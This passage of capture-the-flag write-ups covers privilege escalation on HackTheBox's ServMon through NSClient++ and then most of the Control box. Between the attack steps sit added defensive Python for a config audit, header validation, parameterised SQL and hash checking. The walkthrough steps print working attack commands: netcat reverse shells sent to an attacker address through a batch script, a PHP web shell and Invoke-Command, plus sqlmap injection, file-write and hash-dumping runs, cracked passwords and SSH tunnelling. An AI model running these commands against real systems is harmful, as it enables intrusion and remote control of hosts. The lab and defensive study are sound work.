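# NRPE listener limited to one monitoring host (10.0.0.5 is a made-up address).
HARDENED_INI = """\
[/settings/default]
allowed hosts = 10.0.0.5

[/modules]
WEBServer = disabled
NRPEServer = enabled
CheckExternalScripts = disabled

[/settings/external scripts]
allow arguments = false
"""


def load_nsclient_ini(text: str) -> configparser.ConfigParser:
    """Parse NSClient++-style INI text. Interpolation is disabled because the
    wrapper commands contain literal %SCRIPT% tokens, which ConfigParser would
    otherwise try to expand; '#' and ';' both introduce comments."""
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=("#", ";"))
    cp.read_string(text)
    return cp


def _section(cp: configparser.ConfigParser, name: str):
    return cp[name] if cp.has_section(name) else {}


def audit_nsclient(cp: configparser.ConfigParser) -> List[str]:
    """Return the settings that, together, let an authenticated API user run
    arbitrary commands as the service account (NT AUTHORITY\\SYSTEM above)."""
    findings: List[str] = []
    default = _section(cp, "/settings/default")
    modules = _section(cp, "/modules")
    ext = _section(cp, "/settings/external scripts")

    if default.get("password"):
        findings.append("cleartext API password in /settings/default: any local user who can read the file gets it")
    if default.get("allowed hosts", "").strip() == "127.0.0.1":
        findings.append("allowed hosts is loopback only: it does not stop a local user, and an SSH -L forward reaches it remotely")
    if modules.get("WEBServer", "").lower() == "enabled" and modules.get("CheckExternalScripts", "").lower() == "enabled":
        findings.append("WEBServer and CheckExternalScripts both enabled: the REST API can register and execute scripts")
    if ext.get("allow arguments", "").lower() == "true":
        findings.append("allow arguments = true: callers may pass arguments to external scripts")
    return findings


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: {audit_nsclient(load_nsclient_ini(text)) or ['no findings']}")
```

The loopback finding is the subtle one: `allowed hosts = 127.0.0.1` looks like a network restriction, but any account that can log in to the host (here, via SSH with a reused password) connects from 127.0.0.1, so the real control is the ACL on nsclient.ini and keeping the web API and external scripts off unless they are needed.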

Since we already have a password for nadine, create an SSH tunnel to reach http://127.0.0.1:8443; the web API only accepts connections from 127.0.0.1, and a local port forward arrives from exactly that address.

root@kali:~# ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password:  # L1k3B1gBut7s@W0rk

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

Now we can access https://10.10.10.184:8443 using a web browser.

We already know the password ew2x6SsGTxjRwXOT.
After logging in, we see the following metrics.

Before adding an external script, upload nc64.exe, which can be downloaded from here.
We use scp to transfer the file, since we already have the credential.

root@kali:~# scp ./nc64.exe nadine@10.10.10.184:C:/temp/nc64.exe
nadine@10.10.10.184's password: # L1k3B1gBut7s@W0rk
nc64.exe                                      100%   44KB  54.4KB/s   00:00

After that, create the following script to be executed by NSClient.

root@kali:~# cat rshell.bat 
@echo off
C:\Temp\nc64.exe 10.10.14.42 4443 -e cmd.exe

Using the API, register the batch script as an external script.

root@kali:~# curl -s -k -u admin -XPUT https://localhost:8443/api/v1/scripts/ext/scripts/rshell.bat --data-binary @rshell.bat
Enter host password for user 'admin':
Added rshell as scripts\rshell.bat

Launch netcat listener on port 4443.

root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443

To run the uploaded script manually, execute the following command, which triggers the external script through the API.

root@kali:~# curl -k -u "admin:ew2x6SsGTxjRwXOT" https://127.0.0.1:8443/api/v1/queries/rshell/commands/execute
{"command":"rshell","lines":[{"message":"Command rshell didn't terminate within the timeout period 60s","perf":{}}],"result":3}

Now we have a reverse shell as root.

root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.10.184 53308
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

As always, root.txt is in the directory C:\Users\Administrator\Desktop.

C:\Program Files\NSClient++>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
5d7af017e7cb626125c96ce510ae37c0

Hackthebox Control Walkthrough


Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Control.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.167 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 16:08 JST
Nmap scan report for 10.10.10.167
Host is up (0.23s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
| fingerprint-strings:
|   LDAPBindReq:
|_    Host '10.10.14.42' is not allowed to connect to this MariaDB server
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=8/22%Time=5F40C5AB%P=x86_64-pc-linux-gnu%r(LD
SF:APBindReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.42'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 363.61 seconds

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.167 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.167
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/22 16:40:35 Starting gobuster
===============================================================
/Images (Status: 301)
/admin.php (Status: 200)
/assets (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/uploads (Status: 301)
===============================================================
2020/08/22 16:42:24 Finished
===============================================================

2. Getting User

On port 80, we have a company website.

In the body of the HTML, there are comments indicating that a new payment system is under development.

root@kali:~# curl -s http://10.10.10.167 | head -n 20
<!DOCTYPE html>
<html lang="en">

<head>
	<title>Fidelity</title>
	<meta charset="utf-8">
	<script type="text/javascript" src="assets/js/functions.js"></script>
	<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
	<link rel="stylesheet" href="assets/css/main.css" />
	<noscript>
		<link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>

<body class="is-preload landing">
	<div id="page-wrapper">
		<!-- To Do:
			- Import Products
			- Link to new payment system
			- Enable SSL (Certificates location \\192.168.4.28\myfiles)
		<!-- Header -->

Try to access admin.php, which we found during web enumeration.
It looks like, to access this page, we need:

  1. A header
  2. To go through a proxy

Then, add an HTTP header X-Forwarded-For to all traffic.
We can use Burp Suite for this purpose.
The IP address is the one from the HTML comments.

Now we can access the admin console.
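
The admin page is reachable this way because it treats X-Forwarded-For as the client's real address even though the header is set by whoever sends the request. The following is an added example, not code from the page or from the box's PHP application: the weak address lookup beside a hardened one that honours the header only when the TCP peer is a proxy we operate, and then takes the address that proxy appended rather than whatever the client wrote. The admin network 192.168.4.0/24 is inferred from the comment's address and the proxy 10.0.0.2 is a constructed placeholder.

```python
import ipaddress
from typing import Iterable, Mapping

# Constructed values, not taken from the box's application: the internal range
# the admin page is meant to be limited to, and the one reverse proxy we operate.
ADMIN_NETWORK = ipaddress.ip_network("192.168.4.0/24")
TRUSTED_PROXIES = frozenset({ipaddress.ip_address("10.0.0.2")})


def vulnerable_client_ip(remote_addr: str, headers: Mapping[str, str]) -> str:
    """The weak pattern: X-Forwarded-For is believed unconditionally, so any
    client can claim an internal address simply by sending the header."""
    xff = headers.get("X-Forwarded-For", "")
    first = xff.split(",")[0].strip()
    return first or remote_addr


def effective_client_ip(remote_addr: str, headers: Mapping[str, str],
                        trusted_proxies: Iterable = TRUSTED_PROXIES) -> str:
    """Hardened: the header is honoured only when the TCP peer is a proxy we
    operate. Walking from the right, entries added by our own proxies are
    skipped and the first address a trusted proxy saw is returned; anything
    the client wrote itself (further left) is ignored."""
    trusted = set(trusted_proxies)
    if ipaddress.ip_address(remote_addr) not in trusted:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed entry: fall back to the peer address
        if addr not in trusted:
            return hop
    return remote_addr


def admin_allowed(remote_addr: str, headers: Mapping[str, str],
                  resolver=effective_client_ip) -> bool:
    """Access check for the admin page; the resolver decides which address is
    trusted as the client's."""
    try:
        client = ipaddress.ip_address(resolver(remote_addr, headers))
    except ValueError:
        return False
    return client in ADMIN_NETWORK


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "192.168.4.28"}
    print("direct client, spoofed header, vulnerable:", admin_allowed("10.10.14.42", spoofed, vulnerable_client_ip))
    print("direct client, spoofed header, hardened:  ", admin_allowed("10.10.14.42", spoofed))
```

Even the hardened lookup only makes the address trustworthy; an IP allowlist is still a weak substitute for authentication on an admin console, and the page's later SQL injection shows why defence should not stop at the front door.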

Then, check whether there is any SQL injection.
By submitting a single quote, we find that this search form is vulnerable to SQLi.

Get additional information using sqlmap.
First, save the request from Burp Suite to the following file.

root@kali:~# cat request.txt 
POST /search_products.php HTTP/1.1
Host: 10.10.10.167
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.167
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.167/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
X-Forwarded-For: 192.168.4.28

productName=singlequote

Run the following command.
It confirms that the DBMS is MySQL and that the productName parameter is injectable.

root@kali:~# sqlmap -r request.txt
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.7#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:47:44 /2020-08-22/

[18:47:44] [INFO] parsing HTTP request from 'request.txt'
[18:47:44] [INFO] resuming back-end DBMS 'mysql' 
[18:47:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-4659' OR 1554=1554#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=singlequote' AND (SELECT 6059 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(6059=6059,1))),0x71627a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AQqk

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=singlequote';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=singlequote' AND (SELECT 9910 FROM (SELECT(SLEEP(5)))MSMm)-- ZxSn

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=singlequote' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x514e62776f6a7857665279767352596548547264775877554474616670484969466b4f724f575572,0x71627a6a71),NULL,NULL,NULL#
---
[18:47:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[18:47:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 18:47:44 /2020-08-22/
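
Every injection type sqlmap lists above stems from one defect: the form value is concatenated into the SQL text. The following is an added example, not code from the page or from the box's search_products.php: the concatenating query beside a parameterised one, run against a constructed sqlite3 table standing in for the MariaDB product table (table name, columns and rows are made up). It reproduces the single-quote error the page used to spot the bug and shows that the same input cannot change the parameterised query's meaning.

```python
import sqlite3
from typing import List, Tuple


# Constructed product table standing in for the box's MariaDB; sqlite3 keeps the
# example self-contained. Table name, columns and rows are made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price REAL, public INTEGER)")
    conn.executemany(
        "INSERT INTO product (name, price, public) VALUES (?, ?, ?)",
        [("Router", 49.0, 1), ("Switch", 99.0, 1), ("Internal firewall", 0.0, 0)],
    )
    return conn


def search_products_vulnerable(conn: sqlite3.Connection, product_name: str) -> List[Tuple]:
    """The flawed pattern: the form value is spliced into the SQL text. A quote
    in productName ends the string literal and the rest becomes SQL, which is
    why the sqlmap run above finds boolean-, error- and UNION-based injection."""
    sql = ("SELECT id, name, price FROM product "
           "WHERE public = 1 AND name LIKE '%" + product_name + "%'")
    return conn.execute(sql).fetchall()


def search_products_safe(conn: sqlite3.Connection, product_name: str) -> List[Tuple]:
    """Hardened: the SQL text is constant and the value is bound as a parameter,
    so a quote is just a character inside the LIKE pattern."""
    sql = "SELECT id, name, price FROM product WHERE public = 1 AND name LIKE ?"
    return conn.execute(sql, ("%" + product_name + "%",)).fetchall()


def single_quote_breaks_query(conn: sqlite3.Connection) -> bool:
    """Reproduces the page's first probe: a lone quote makes the concatenated
    query syntactically invalid. Such errors belong in the server log, not in
    the HTTP response, since an echoed error is what enables error-based
    extraction."""
    try:
        search_products_vulnerable(conn, "'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("single quote breaks concatenated query:", single_quote_breaks_query(db))
    print("vulnerable, filter bypass :", search_products_vulnerable(db, "' OR 1=1 --"))
    print("safe, same input          :", search_products_safe(db, "' OR 1=1 --"))
```

The `public = 1` column shows what injection costs beyond the obvious: the concatenated query returns the non-public row as well, because the injected `OR` applies to the whole WHERE clause, while the parameterised query keeps the author's filter intact whatever the input.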

After that, run the following command to retrieve the MySQL password hashes.
We obtain three hashes, for hector, manager and root.

root@kali:~# sqlmap -r request.txt --password

---

database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

[18:50:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 18:50:54 /2020-08-22/

Using John the Ripper, we can crack the password hash with rockyou.txt.

root@kali:~# cat hash.txt 
hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
root@kali:~# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
l33th4x0rhector  (hector)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:01 DONE (2020-08-22 18:57) 0.7299g/s 10468Kp/s 10468Kc/s 25610KC/sa6_123..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we have this credential.

hector:l33th4x0rhector
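As an added illustration (not from the original walkthrough), the following Python reproduces the hash scheme John's mysql-sha1 mode targets and checks a dumped hash file against a candidate list; the hash lines are the ones from hash.txt above, the candidate list is constructed, and only hector's entry is expected to match:

```python
import hashlib

# The scheme behind John's "mysql-sha1" format (mysql_native_password,
# MySQL 4.1+): '*' + upper-case hex of SHA1(SHA1(password)). The outer SHA1
# runs over the raw 20-byte inner digest, not its hex text, and no salt is used.
def mysql_native_password_hash(password: str) -> str:
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_hash_file(text: str) -> dict:
    """Parse 'user:*HASH' lines in the layout of hash.txt above."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        user, sep, digest = line.partition(":")
        if not sep or not digest.startswith("*") or len(digest) != 41:
            raise ValueError(f"line {lineno}: not a mysql_native_password hash")
        entries[user] = digest.upper()
    return entries


def audit_weak_passwords(entries: dict, candidates) -> dict:
    """Map each account to the candidate that reproduces its hash.

    Because the scheme is unsalted, every candidate is hashed exactly once and
    compared with all accounts at the same time; that is why a wordlist run
    against a dumped mysql.user table is so cheap, and why hector's password
    fell to rockyou.txt in about a second above."""
    lookup = {mysql_native_password_hash(c): c for c in candidates}
    return {user: lookup[h] for user, h in entries.items() if h in lookup}


# Copy of the page's hash.txt, plus a constructed three-entry candidate list.
HASH_FILE = """\
hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
"""
CANDIDATES = ["password", "123456", "l33th4x0rhector"]

if __name__ == "__main__":
    found = audit_weak_passwords(parse_hash_file(HASH_FILE), CANDIDATES)
    for user, pw in found.items():
        print(f"{user}: weak password found ({pw})")
```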

Next, to get a shell, upload a PHP webshell with the following command.
Kali Linux ships simple-backdoor.php under /usr/share/webshells/php/.

root@kali:~# sqlmap -r request.txt --file-write=/usr/share/webshells/php/simple-backdoor.php --file-dest=C:/inetpub/wwwroot/backdoor.php

---

[*] starting @ 19:05:43 /2020-08-22/

[19:05:43] [INFO] parsing HTTP request from 'request.txt'
[19:05:43] [INFO] resuming back-end DBMS 'mysql' 
[19:05:43] [INFO] testing connection to the target URL

---

[19:05:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:05:44] [INFO] fingerprinting the back-end DBMS operating system
[19:05:44] [INFO] the back-end DBMS operating system is Windows
[19:05:45] [WARNING] potential permission problems detected ('Access denied')
[19:05:46] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)          
do you want confirmation that the local file '/usr/share/webshells/php/simple-backdoor.php' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/backdoor.php')? [Y/n] Y
[19:06:05] [INFO] the local file '/usr/share/webshells/php/simple-backdoor.php' and the remote file 'C:/inetpub/wwwroot/backdoor.php' have the same size (328 B)
[19:06:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 19:06:05 /2020-08-22/

To confirm that the webshell was uploaded correctly, use curl.

root@kali:~# curl http://10.10.10.167/backdoor.php?cmd=whoami
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<pre>nt authority\iusr
</pre>

Next, upload nc.exe to get a reverse shell.

root@kali:~# sqlmap -r request.txt --file-write=/usr/share/windows-binaries/nc.exe --file-dest=C:/inetpub/wwwroot/nc.exe

---

do you want confirmation that the local file '/usr/share/windows-binaries/nc.exe' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/nc.exe')? [Y/n] Y
[19:23:18] [INFO] the local file '/usr/share/windows-binaries/nc.exe' and the remote file 'C:/inetpub/wwwroot/nc.exe' have the same size (59392 B)
[19:23:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 19:23:18 /2020-08-22/

Using the uploaded webshell, we can run the dir command.
It confirms that nc.exe is in the folder C:\inetpub\wwwroot.

root@kali:~# curl http://10.10.10.167/backdoor.php?cmd=dir+C:\\inetpub\\wwwroot
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<pre> Volume in drive C has no label.
 Volume Serial Number is C05D-877F

 Directory of C:\inetpub\wwwroot

08/22/2020  12:36 PM    <DIR>          .
08/22/2020  12:36 PM    <DIR>          ..
11/05/2019  03:42 PM             7,867 about.php
11/20/2019  02:16 AM             7,350 admin.php
10/23/2019  05:02 PM    <DIR>          assets
08/22/2020  12:19 PM               328 backdoor.php
11/05/2019  03:42 PM               479 create_category.php
11/05/2019  03:42 PM               585 create_product.php
11/05/2019  03:42 PM               904 database.php
11/05/2019  03:42 PM               423 delete_category.php
11/05/2019  03:42 PM               558 delete_product.php
11/05/2019  03:42 PM    <DIR>          images
11/19/2019  06:57 PM             3,145 index.php
11/05/2019  03:42 PM            17,128 LICENSE.txt
08/22/2020  12:36 PM            59,392 nc.exe
11/19/2019  07:07 PM             3,578 search_products.php
11/05/2019  03:42 PM               498 update_category.php
11/05/2019  03:42 PM             4,056 update_product.php
11/12/2019  12:49 PM    <DIR>          uploads
11/05/2019  03:42 PM             2,933 view_product.php
              15 File(s)        109,224 bytes
               5 Dir(s)  43,613,020,160 bytes free
</pre>

Preparation for the reverse shell is now complete.
Launch a netcat listener and execute the following curl command.

root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...

root@kali:~# curl http://10.10.10.167/backdoor.php?cmd=C:\\inetpub\\wwwroot\\nc.exe+-e+powershell.exe+10.10.14.42+4443

The target machine spawns a PowerShell session and sends it back to our host as nt authority\iusr.
However, this account still cannot read user.txt, so lateral movement is needed.

root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.167] 51393
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot> whoami
whoami
nt authority\iusr
PS C:\users\Hector> ls
ls
ls : Access to the path 'C:\users\Hector' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\users\Hector:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

We already have the password l33th4x0rhector for Hector.
To get a user shell as Hector, we still need the hostname of this machine.

PS C:\users\Hector> hostname
hostname
Fidelity

To run a command as hector, execute the following commands.
Running whoami shows that the command is executed as control\hector.

PS C:\> $password = convertto-securestring -AsPlainText -Force -String "l33th4x0rhector"
$password = convertto-securestring -AsPlainText -Force -String "l33th4x0rhector"
PS C:\> $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Fidelity\hector",$password
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Fidelity\hector",$password
PS C:\> Invoke-Command -ComputerName LOCALHOST -ScriptBlock { whoami } -Credential $credential
Invoke-Command -ComputerName LOCALHOST -ScriptBlock { whoami } -Credential $credential
control\hector

Then get a reverse shell as hector.
Launch a netcat listener and run the following PowerShell command on the target machine.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

PS C:\> Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\inetpub\wwwroot\nc.exe 10.10.14.42 4444 -e powershell.exe } -Credential $credential

Go back to the netcat listener window.
We can see that we got a shell as control\hector.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.167] 51401
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Hector\Documents> whoami
whoami
control\hector

user.txt is in the folder C:\Users\Hector\Desktop\.

PS C:\Users\Hector\Documents> cat C:\users\hector\Desktop\user.txt
cat C:\users\hector\Desktop\user.txt
d8782dd01fb15b72c4b5ba77ef2d472b

3. Getting Root

Take a look at the PowerShell command history.
It contains only 2 commands.

PS C:\> gc (get-PSReadlineOption).HistorySavePath
gc (get-PSReadlineOption).HistorySavePath
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

The first command lists the entries of HKLM:\SYSTEM\CurrentControlset.
It contains the following 6 keys.

  1. Control
  2. Enum
  3. Hardware profiles
  4. Policies
  5. Services
  6. Software

PS C:\Users\Hector\Documents> get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list


Property      : {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Control
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 121
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 11
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control

Property      : {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Enum
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 17
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 27
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Hardware Profiles
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 3
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Policies
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 0
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Services
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 667
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Software
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 1
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software

The second command tries to read the access permissions of this registry tree.
The output includes the SDDL (Security Descriptor Definition Language) string as well, but raw SDDL is not human readable.

PS C:\> get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list


Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow  FullControl
         NT AUTHORITY\Authenticated Users Allow  ReadKey
         NT AUTHORITY\Authenticated Users Allow  -2147483648
         S-1-5-32-549 Allow  ReadKey
         S-1-5-32-549 Allow  -2147483648
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         CREATOR OWNER Allow  268435456
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -2147483648
         S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  
         ReadKey
         S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  
         -2147483648
Audit  : 
